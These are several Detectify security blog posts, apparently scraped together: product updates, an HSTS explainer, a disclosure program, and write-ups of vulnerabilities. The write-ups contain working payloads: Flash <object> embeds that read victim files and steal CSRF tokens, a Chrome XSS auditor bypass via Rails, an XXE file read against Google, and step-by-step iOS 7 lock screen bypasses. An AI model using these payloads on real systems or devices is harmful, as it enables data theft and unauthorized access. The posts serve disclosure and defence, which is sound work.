Major updates to Detectify

We are releasing multiple major changes to Detectify and this is the beginning of the new Detectify. Many hours have been invested in a new and improved UI. There are also multiple changes under the hood in the core of the service, e.g., updated engine to better handle JS-based pages.

New user interface

The ambition with the new UI is to create a flexible design where it is easier for us introduce new functionality to our users. The release plan is packed with features that will help you as a developer and security tester.

We have introduced new features for improved usability, e.g.,

  • Scanning behind login and testing of predefined user flows (e.g., check-out flows)

  • Released the API for you to build integrations into your development tools

Improved coverage of new and updated attack vectors

New and updated modules for vulnerability testing in this release are e.g., CSRF (testing of forms), SSL Breach, Flash content sniffing (Rosetta Flash), DNS SPF (fake the sender of e-mails), DNSSEC tests, CSS parser and for all of you with internal legacy systems, VBS. An update of our JS-engine brings improved coverage of DOM-based XSS.

Set-up recurring testing

Don’t forget to set up recurring scanning of your site to make sure you are always tested for new security issues. New attack vectors are constantly being identified and we release new versions of the scanner frequently.


Do you feel that something is missing from Detectify or have general comment? Hit us up at @detectify or general@detectify.com. We are aiming to improve Detectify and make the Internet a safer place.

Happy scanning!

Comments

The pitfalls of allowing file uploads on your website

These days a lot of websites allow users to upload files, but many don’t know about the unknown pitfalls of letting users (potential attackers) upload files, even valid files.

What’s a valid file? Usually, a restriction would be on two parameters:

  • The uploaded file extension
  • The uploaded Content-Type.

For example, the web application could check that the extension is “jpg” and the Content-Type “image/jpeg” to make sure it’s impossible to upload malicious files. Right?

The problem is that plugins like Flash doesn’t care about extension and Content-Type. If a file is embedded using an <object> tag, it will be executed as a Flash file as long as the content of the file looks like a valid Flash file.

But wait a minute! Shouldn’t the Flash be executed within the domain that embeds the file using the <object> tag? Yes and no. If a Flash file (bogus image file) is uploaded on victim.com and then embedded at attacker.com, the Flash file can execute JavaScript within the domain of attacker.com. However, if the Flash file sends requests, it will be allowed to read files within the domain of victim.com.

This basically means that if a website allows file uploads without validating the content of the file, an attacker can bypass any CSRF protection on the website.

The attack

Based on these facts we can create an attack scenario like this:

  1. An attacker creates a malicious Flash (SWF) file
  2. The attacker changes the file extension to JPG
  3. The attacker uploads the file to victim.com
  4. The attacker embeds the file on attacker.com using an tag with type “application/x-shockwave-flash”
  5. The victim visits attacker.com, loads the file as embedded with the tag
  6. The attacker can now send and receive arbitrary requests to victim.com using the victims session
  7. The attacker sends a request to victim.com and extracts the CSRF token from the response

A payload could look like this:

<object style="height:1px;width:1px;" data="http://victim.com/user/2292/profilepicture.jpg" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=read&u=http://victim.com/secret_file.txt"></object>

The fix

The good news is that there’s a fairly easy way to prevent Flash from doing this. Flash won’t execute the file if it sends a Content-Disposition header like so:

Content-Disposition: attachment; filename=”image.jpg

So if you allow file uploads or printing arbitrary user data in your service, you should always verify the contents as well as sending a Content-Disposition header where applicable.

Another way to remediate issues like this is to host the uploaded files on a separate domain (like websiteusercontent.com).

Other uses

But the fun doesn’t stop at file uploads! Since the only requirements of this attack is that an attacker can control the data on a location of the target domain (regardless of Content-Type), there’s more than one way to perform this attack.

One way would be to abuse a JSONP API. Usually, the attacker can control the output of a JSONP API endpoint by changing the callback parameter. However, if an attacker uses an entire Flash file as callback, we can use it just like we would use an uploaded file in this attack. A payload could look like this:

<object style="height:1px;width:1px;" data="http://victim.com/user/jsonp?callback=CWS%07%0E000x%9C%3D%8D1N%C3%40%10E%DF%AE%8D%BDI%08%29%D3%40%1D%A0%A2%05%09%11%89HiP%22%05D%8BF%8E%0BG%26%1B%D9%8E%117%A0%A2%DC%82%8A%1Br%04X%3B%21S%8C%FE%CC%9B%F9%FF%AA%CB7Jq%AF%7F%ED%F2%2E%F8%01%3E%9E%18p%C9c%9Al%8B%ACzG%F2%DC%BEM%EC%ABdkj%1E%AC%2C%9F%A5%28%B1%EB%89T%C2Jj%29%93%22%DBT7%24%9C%8FH%CBD6%29%A3%0Bx%29%AC%AD%D8%92%FB%1F%5C%07C%AC%7C%80Q%A7Nc%F4b%E8%FA%98%20b%5F%26%1C%9F5%20h%F1%D1g%0F%14%C1%0A%5Ds%8D%8B0Q%A8L%3C%9B6%D4L%BD%5F%A8w%7E%9D%5B%17%F3%2F%5B%DCm%7B%EF%CB%EF%E6%8D%3An%2D%FB%B3%C3%DD%2E%E3d1d%EC%C7%3F6%CD0%09" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=alert&u=http://victim.com/secret_file.txt"></object>

tl;dr: Send Content-Disposition headers for uploaded files and validate your JSONP callback names. Or put the uploaded files on a separate domain

And like always, if you want to know if your website has issues like these, try a Detectify scan!

That’s it for now.

Written by: Mathias, Frans

Comments

How we got read access on Google’s production servers

To stay on top on the latest security alerts we often spend time on bug bounties and CTF’s. When we were discussing the challenge for the weekend, Mathias got an interesting idea: What target can we use against itself?

Of course. The Google search engine!

What would be better than to scan Google for bugs other than by using the search engine itself? What kind of software tend to contain the most vulnerabilities?

  • Old and deprecated software
  • Unknown and hardly accessible software
  • Proprietary software that only a few people have access to
  • Alpha/Beta releases and otherwise new technologies (software in early stages of it’s lifetime)

For you bounty hunters, here’s a tip: Google Dork

By combining one thing with another, we started Google dorking for acquisitions and products to antique systems without any noticeable amount of users.

One system caught our eyes. The Google Toolbar button gallery. We looked at each other and jokingly said “this looks vuln!”, not knowing how right we were.

Not two minutes later we noticed that the gallery provides users with the ability to customize their toolbar with new buttons. If you’re a developer, you’re also able to create your own buttons by uploading XML files containing various meta data (styling and such).

Fredrik read through the API specifications, and crafted his own button containing fishy XML entities. The plan was to conduct an XXE attack as he noticed the title and description fields were printed out when searching for the buttons.

The root cause of XXE vulnerabilities are naive XML parsers that blindly interpret the DTD of the user supplied XML documents. By doing so, you risk having your parser doing a bunch of nasty things. Some issues include: local file access, SSRF and remote file includes, Denial of Service and possible remote code execution. If you want to know how to patch these issues, check out the OWASP page on how to secure XML parsers in various languages and platforms.

Never the less. The file got uploaded… and behold! First try: /etc/passwd

Second try (for verification purposes): /etc/hosts

Boom goes the dynamite.

What you see here is the /etc/passwd and the /etc/hosts of one of Google’s production servers. Our payloads served as a proof of concept to prove the impact. We could just as well have tried to access any other file on their server, or moved on to SSRF exploitation in order to access internal systems. Too say the least, that’s pretty bad.

We contacted Google straight away while popping open some celebration beers. After 20 minutes we got a reply from Thai on the Google Security Team. They were impressed. We exchanged a few emails on the details back and forth during the coming days. In our correspondence we asked how much the vulnerability was worth. This is what we received as reply: XXE Meme

The bottles (or whatever it is that falls out), turned out to be worth $10.000, enough to cover a road trip through Europe.

tl;dr: We uploaded a malicious XML to one of Google’s servers. Turned out to be a major XXE issue. Google financed an awesome road trip for the team.

Thanks for reading.

Written by: Fredrik
Co-Author: Mathias

If Google can get hacked, are you sure your service is secure? Try Detectify here and see for yourself.

Comments

Chrome XSS Protection Bypass (using Rails)

What is the Chrome XSS protection?
The Chrome XSS Protection (also known as XSS auditor) checks whether a script that’s about to run on a web page is also present in the request that fetched that web page. If the script is present in the request, that’s a strong indication that the web server might have been tricked into reflecting the script. So in short, it blocks reflected XSS attacks.

A couple of months ago I discovered that the Chrome XSS Protection could be bypassed in Rails. Later, when I saw the issue brought up on twitter by homakov, I figured I’d write something about it as well. Here’s how the testing went down:

First try
First off we started with creating a dummyscript with a straight forward XSS scenario. Here’s the code:

<h1>Variable: <%= raw params[:variable] %></h1>

Let’s test it with a basic cross-site scripting payload:

GET /?variable=<script>alert(1)</script> HTTP/1.1
<h1>Variable: <script>alert(1)</script></h1>

Oh, no! The XSS auditor blocked the attempt. Let’s try something a bit different!

The bypass

GET /?variable[<script>]=*alert(1)</script> HTTP/1.1
<h1>Variable: {"<script>"=>"*alert(1)</script>"}</h1>

It works! But why? Let’s have a closer look at the source code strip away everything except the <script> tag:

<script>"=>" * alert(1)</script>

Okay, so a bit more clear. The asterix will work as a multiplication of whatever’s on either side. So, the javascript will try to multiplicate the string “=>” with whatever the function alert() produces. Since alert doesn’t return anything, the righthand value will be “undefined” and the final result of the calculation will be “NaN”.

The XSS auditor probably misses this because Rails doesn’t print exactly what the browser sent, making it hard to filter automatically. However, Internet Explorers XSS auditor as well as NoScript finds it.

TL;DR: Chrome’s XSS auditor can be bypassed with rails like so: ?variable[<script>]=*alert(1)</script>.

Want to try the worlds (if you want to) cheapest web security scanner? Sign up here.
Written by: Mathias Karlsson

Comments

Detectify Responsible Disclosure Program

As of today, researchers can report security issues in Detectify services to earn a spot on our Hall of Fame as well as some cool prizes. The Detectify team has participated in most Responsible Disclosure programs out there and we felt the time is here to have one of our own.

But our service is made for finding web vulnerabilities, how come we need a Disclosure program? Well. Even though our services are based around finding security bugs in web applications, we are not as naive as to think that our own applications are 100% flawless. We take security issues seriously and will respond swiftly to fix verifiable security issues. If you are the first to report a verifiable security issue, we’ll thank you with some cool stuff and a place at our hall of fame page.

So how does the reporting process work? It’s a 5 step process:

  • A researcher sends a mail using the correct template to disclosure@detectify.com
  • The researcher will get an automatic response confirming that we have acquired the issue
  • A support case is automatically created
  • The person assigned to the support case responds to the researcher, verifying the issue
  • The issue is patched and the researcher is showered in eternal

What bugs are eligible? Any typical web security bugs such as:

  • Cross-site Scripting
  • Open redirect
  • Cross-site request forgery
  • File inclusion
  • Authentication bypass
  • Server-side code execution

What bugs are NOT eligible? Any typical low impact/too high complexity such as:

  • Missing Cookie flags on non-session cookies or 3rd party cookies
  • Logout CSRF
  • Social engineering
  • Denial of service
  • SSL BEAST/CRIME/etc

So what are you waiting for?

Sign up for Detectify here.

Comments

Another iOS7 Lock Screen bypass – Control Center turned off

In our previous post we covered a bug released yesterday where anyone can break into a phone that is using iOS7.

We also wrote about some additional ways to trigger the bug, but all versions could be prevented by shutting off the Control Center on Lock Screen. So that’s what we, and everyone else suggested.

However, we have discovered that this does in fact not prevent a similar bug from exploiting the lock screen. The new way is based on the fact that Voice Control/Siri can make phone calls to known contacts, and by using the shutdown screen while calling, the double tap trick can still be done.


And here’s the aftermath: https://twitter.com/avlidienbrunn/status/381099165213683712 .

Currently we have no suggested patch/fix for this issue.

Written by Mathias/Frans
Back to Detectify blog
Back to Detectify

Comments

iOS 7 lock screen bypass write-up

Yesterday a researcher named Jose Rodriguez published a way to bypass the lock screen on the new iOS 7. Naturally, we at Detectify checked it out and played a bit with the bug.

Reproduction
• Make sure the camera app is running. This can be achieved by either using the control center, or swiping the bottom right corner on the main lock screen.
• Enter the control center (swipe the bottom center on the main lock screen)
• Open the timer app, in the bottom left corner next to the flashlight app
• Hold down the power button
• Press cancel
• Between the shutdown screen and the timer app, double tap the home button and hold down the second click for around half a second
• Swipe to the camera app

If you did everything correctly, you can now access the gallery and everything inside. This includes sending mail, using twitter and sending text messages as well.

Other ways to trigger the bug
We also discovered that this bug can be triggered in some other ways. For once, the bug can be triggered not only in the timer app, but also in the calculator app. Another way is to use Siri/Voice control instead of the shut down screen. Then you could apply the same “magic double tap” between Siri/Voice control and the calculator app.

(Outcome: https://twitter.com/avlidienbrunn/status/381020433929101312)

Temporary fix
So what could we do to protect ourselves until Apple releases a patch for this bug? You can shut off access to the control center while locked if you go to Settings -> Control Center -> Access on Lock Screen Read more

Written by: Mathias
Back to Detectify Blog
Back to Detectify

Comments

Server-side Javascript Injections and more!

Today’s updates fills the needs of many of you out there! You asked for it, and now it’s in the Detectify engine! Here’s a breakdown on the stuff we’ve put in:

Verify your domain with Google Analytics

Having trouble editing your code? Don’t want to upload files? No problem! You can now verify the ownership of your domain using your Google Analytics account. Try it out in the dashboard or in the sign up!

National Vulnerability Database

Our fingerprinting has been extended using the U.S national vulnerability database. Detectify will now try known vulnerabilities based on the versions we fingerprint from your domain. We will then warn you when there’s a security issue in the version you’re using.

Server-Side JavaScript Injections

We have now a feature for pentesting server side JavaScript. That means, we are able to find NoSQL injections in MongoDB, code execution flaws in Node.JS and other flaws in exotic server-side JS-technologies.

Content-Security-Policy

Our site at detectify.com now sends a Content-Security-Policy header. Content-Security-Policy is a header for security that allows website owners to declare from what sources the users may load content from. Read more about Content Security Policy here.

Download report

Yes, we finally added support for downloading your reports as PDF files, conveniently making them accessible offline. The design of the PDF reports is still in progress and if you have any issues/suggestions, feel free to mail us about it at hello@detectify.com!

Sign up

Comments

HTTP Strict Transport Security (HSTS)

HTTP Strict Transport Security, or just HSTS, is a security mechanism for websites and browsers. HSTS is used when web servers want to tell its clients that they should only use HTTPS, and not HTTP.

This mechanism is useful, because loads and loads of websites have a lazy encryption discipline, and while most of the website is loaded with HTTPS, some resources, such as JavaScript, plugin resources and images are loaded with plain HTTP. This is horrendous. Using HTTPS is nearly pointless if there are resources on the website that are loaded with plain HTTP, since the session cookies will be sent with every request, including the plain HTTP ones. This may lead to session hijacking (unless, of course, the cookies have been flagged as “Secure”).

HSTS is initiated by the server in its Strict-Transport-Security header, which also specifies how long it will take before the HSTS header expires. After this, the website is considered non-HSTS by the browser unless another HSTS header is received.

If, for example, Alice had been using Firefox or Chrome, which both have a preloaded list of websites employing HSTS, she would have been a lot better off. (Given that the website was using HSTS and was mentioned in the preloaded HSTS list.) Everything would’ve been transferred through HTTPS. This is a nice way to prevent SSL stripping attacks. SSL stripping is a method which enables the attacker to conduct Man-In-The-Middle-Attacks unencrypted by moving the SSL “end point” from the user (Alice) to the man in the middle (Eve), while the traffic between Eve and the web server is encrypted. This way, the web server thinks everything is okay, and Alice has no idea that the traffic is supposed to be encrypted unless the web server uses HSTS. If HSTS is used, Alice’s browser knows that the traffic is supposed to be encrypted, and can therefore determine that something fishy is going on when it isn’t.

If you feel like going more in-depth, you may read RFC6797, which can be found at the IETF website or if you wish to integrate HSTS on your website, then check out this OWASP page regarding the subject.

Do you care about security? Try detectify!

Written by: Håkon Vågsether.

Comments

Performance boost, new verification methods and custom paths

Today’s update is a big one! Mostly behind the scenes updates but you are going to notice some things that we hope you’ll appreciate!

Performance boost

We have implemented a new HTML parser which will make the scans much faster. For bigger sites, even hours faster, we’ve seen scan time go from 14 hours down to 2.

Not only are we scanning faster, the new HTML parser is easier to work with which will make our development easier and faster. This will allow us to keep our scanner up to date even better.

New verification methods

People have asked us to add more ways to verify the ownership of their website that doesn’t involve the web server or code. For that we have added CNAME and TXT verification, which is just DNS settings.

Add a CNAME for a subdomain and add the right target or add a TXT record and you are good to go!

Custom paths

If you have a hidden path robots can’t find (maybe an admin panel on a hidden location?) you can now tell our scanner where it is.

We have also added a blacklist for paths you don’t want us to scan.

Other than that, we now have a new front page, be sure to check it out!

Let us know what you think!

Comments